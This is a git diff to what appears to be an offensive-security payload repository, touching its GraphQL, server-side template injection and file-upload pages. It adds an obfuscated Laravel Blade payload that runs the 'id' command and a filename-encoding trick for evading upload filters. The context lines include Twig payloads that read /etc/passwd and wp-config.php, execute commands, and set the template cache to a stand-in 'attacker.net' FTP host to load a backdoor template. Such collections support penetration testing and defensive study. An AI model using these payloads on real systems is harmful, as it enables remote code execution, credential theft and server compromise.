diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 4e69a37b..0192f55a 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -38,6 +38,7 @@ - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs +- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index f8502ad6..cc3618c3 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -21,21 +21,34 @@ ## Templating Libraries -| Template Name | Payload Format | -| -------------- | --------- | -| Laravel Blade | `{{ }}` | -| Latte | `{var $X=""}{$X}` | -| Mustache | `{{ }}` | -| Plates | `` | -| Smarty | `{ }` | -| Twig | `{{ }}` | +| Template Name | Payload Format | +| --------------- | --------- | +| Blade (Laravel) | `{{ }}` | +| Latte | `{var $X=""}{$X}` | +| Mustache | `{{ }}` | +| Plates | `` | +| Smarty | `{ }` | +| Twig | `{{ }}` | + +## Blade + +[Official website](https://laravel.com/docs/master/blade) +> Blade is the simple, yet powerful templating engine that is included with Laravel. + +The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`. + +```php +{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} +``` + +--- ## Smarty [Official website](https://www.smarty.net/docs/en/) > Smarty is a template engine for PHP. -```python +```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} @@ -52,7 +65,7 @@ ### Twig - Basic Injection -```python +```php {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} @@ -62,7 +75,7 @@ ### Twig - Template Format -```python +```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) @@ -76,14 +89,14 @@ $output = $twig > render ( ### Twig - Arbitrary File Reading -```python +```php "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{include("wp-config.php")}} ``` ### Twig - Code Execution -```python +```php {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} @@ -249,4 +262,5 @@ layout template: ## References +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 87137471..056d6057 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -406,3 +406,4 @@ PoC : - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 2047d0c3..75f5aa94 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` + * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt` * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".